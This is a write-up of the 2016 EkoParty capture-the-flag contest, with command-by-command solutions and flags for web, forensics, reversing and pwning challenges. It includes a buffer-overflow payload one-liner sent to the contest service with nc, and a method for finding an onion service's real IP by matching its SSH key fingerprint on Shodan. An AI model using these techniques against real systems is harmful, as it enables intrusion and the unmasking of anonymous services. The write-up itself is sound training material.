What follows is a write-up of the 2016 EkoParty Capture the Flag competition.
Competitors were given a set of challenges which they had to complete to get a flag.
The categories included:
- FBI
- Forensics
- Misc
- Pwning
- Reversing
- Web
[*] Note: Written in the order completed.
Challenge: Web – Mr. Robot (25)
Disallow it!
Solution:
Browse to: https://ctf.ekoparty.org/robots.txt
Browse to: https://ctf.ekoparty.org/static/wIMti7Z27b.txt
Flag: EKO{robot_is_following_us}
Challenge: Web – RFC 7230 (50)
Get just basic information from this server (ctf.ekoparty.org).
Solution:
Open up Burp Proxy with Intercept On
Browse to: https://ctf.ekoparty.org/
Right-click -> Do Intercept -> Response to this request
Flag: EKO{this_is_my_great_server}
Challenge: Forensics – Hidden inside EKO (50)
Find the hidden flag in the EKO pixels!
Solution:
stegsolve background.png
Alpha plane 7
Flag: EKO{th3_fl4g}
Challenge: FBI – Find me (100)
Now, use your hacker-fu to get the real IP from this service, please use EKO{IP} as the answer.
ssh ekosshlons2uweke.onion
Solution:
torify ssh-keyscan ekosshlons2uweke.onion 2>/dev/null
# Enumerating the public keys
Copy/Paste the output of the above in a file ‘find_me.txt’
ssh-keygen -l -f find_me.txt
# Creating RSA and ECSDA keys
Browse to: https://www.shodan.io/
Search for: 4f:b2:e5:dd:63:86:dd:52:d1:d5:a4:d3:3c:55:e5:2e
Flag: EKO{52.73.16.127}
Challenge: Pwning – Ultra baby (25)
Reach the flag function!
nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000
Attachment
pwn25_5ae6e58885e7cd75.zip
Solution:
./r2_ui ultrababy
Actions -> Analyze
# Notice the flag at 0x000007f3
r2 ultrababy
doo
dc
python -c “print ‘A’ * 30”
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Note how it says “Invalid command ‘AAAAA’ (0x41)”
doo
python -c “print ‘A’ * 23 + ‘\x7f3′” | ./ultrababy
# We get a segmentation fault
python -c “print ‘A’ * 24 + ‘\xf3′” | ./ultrababy
# We got our solution
python -c “print ‘A’ * 24 + ‘\xf3′” | nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 55000
Flag: EKO{Welcome_to_pwning_challs_2k16}
Challenge: Reversing – JVM (25)
Bytecodes everywhere, reverse them.
Attachment
rev25_3100aa76fca4432f.zip
Solution:
# Notice the title ‘JVM’ as well as the filename ‘EKO.class’
jad EKO.class
cat EKO.jad
# See EKO.py
python EKO.py
Flag: EKO{893116}
Challenge: Reversing – F#ck (50)
The miracle of the expressive functional programming, is it really functional?
Attachment
rev50_3511a8cd66b371eb.zip
Solution:
file FlagGenerator.exe
# This is a .Net binary
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program
Flag: EKO{f#ck_this_sh#t}
Challenge: Reversing – RrEeGgEeXx (75)
State-of-the-art on authentication mechanisms.
Attachment
rev75_79816641bfd11577.zip
Solution:
Open Visual Studio -> Tools -> ILSpy -> Open the file
Decompile the program
”’
Note the:
if (Program.check_regex(“^.{40}$”, input)
&& Program.check_regex(“\\w{3}\\{.*\\}”, input)
&& Program.check_regex(“_s.*e_”, input)
&& Program.check_regex(“\\{o{2}O{2}o{2}”, input)
&& Program.check_regex(“O{2}o{2}O{2}\\}”, input)
&& Program.check_regex(“sup3r_r3g3x_challenge”, input))
The flag contains:
1) exactly 40 characters
2) 3 random letters, then { <random characters> }
This translates to EKO{<random>}
3) _s, then random characters, then e_
4) {ooOOoo
5) OOooOO}
6) sup3r_r3g3x_challenge
This translates to: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
”’
Flag: EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
Challenge: Reversing – Old Times (100)
Grace Hopper will be proud of you! Don’t let her down!
Attachment
rev100_62f48362bc4a0397.zip
Solution:
Open ViewSavF -> Open the file
Library – Part1 – EKOPARTY(PF) -> CHALLENGE1
Flag: EKO{0ld_t1m3s_n3v3r_c0m3_b4ck}
Challenge: Back Again (150)
There are no disassemblers for this kind of program or this is what we think, can you proof otherwise?
Attachment
rev150_9f0cc9207d9c580d.zip
Solution:
dd conv=ascii if=CHALLENGE2.MBR of=CHALLENGE2.txt
# Convert from EBCDIC to ASCII
strings CHALLENGE2.txt
”’
Note:
LNRENTER SECRET KEYCHECKING SECRET KEYOKAY! GRAB YOUR FLAGCA}wN_tfYO_mU_gpPL_yEAtrSEap_GokIVe_E_t3ME3l_T_lHE0b_F0cLA{OG?KEOH SNAP, YOUR KEY IS WRONG!CHALLENGE2
This translates to: EKO{c0b0l_l33t_ekoparty_pgm_ftw}
”’
Flag: EKO{c0b0l_l33t_ekoparty_pgm_ftw}
Challenge: Forensics – Damaged (75)
All you have to do is to see this damaged image!
Attachment
for75_165560e4a08b23f7.zip
Solution:
Read about the BMP file structure: https://en.wikipedia.org/wiki/BMP_file_format
hexedit -b damaged_image.bmp
”’
The corrupt image starts with the DIB header, it doesn’t have the BMP header
The BMP header template is: 42 4d AA AA AA AA 00 00 00 00 BB BB BB BB
Where ‘AA’ is the size of the file and ‘BB’ is the offset of the pixel array
We will change it to: 42 4d 46 00 00 00 00 00 00 00 36 00 00 00
”’
Add the above using Ctrl-A
Ctrl-X
Open the file
Flag: EKO{b1tm4p_r3c}
Challenge: Forensics – Hacker in Disguise (100)
We have captured these codes in a secret communication, please tell us its meaning.
Hint
Hacker In Disguise Uses Sweet Bubbles
Attachment
for100_329717ebd73d0b20.zip
Solution:
# After searching with different parts of the file, we find out that
# this turns out to be a log file of an HID keyboard
# The title itself gave the hint with the first letter of every word: H-I-D-U-S-B
Google: hid keyboard commands
Read: http://www.freebsddiary.org/APC/usb_hid_usages.php
# We build the HID usage table in Python
vi HID_convert.py
# We build a script for HID to ASCII conversion
vi HID-to-ascii.py
python HID-to-ascii.py
Flag: EKO{HOLAPIANOLA}
Challenge: Forensics – Alice Secret Message (175)
There is something fishy here!
Attachment
for175_8ea180f3d676d67d.zip
Solution:
Unzip the image
testdisk PhysicalDrive5
Proceed -> None -> Advanced -> Undelete -> a -> C -> C -> q -> Quit
Open ‘OFICIO.txt’
# Note the strange spacing
# There are eight spaces/tabs per line
# See secret_message.py
python secret_message.py
Flag: EKO{this_is_my_secret_message}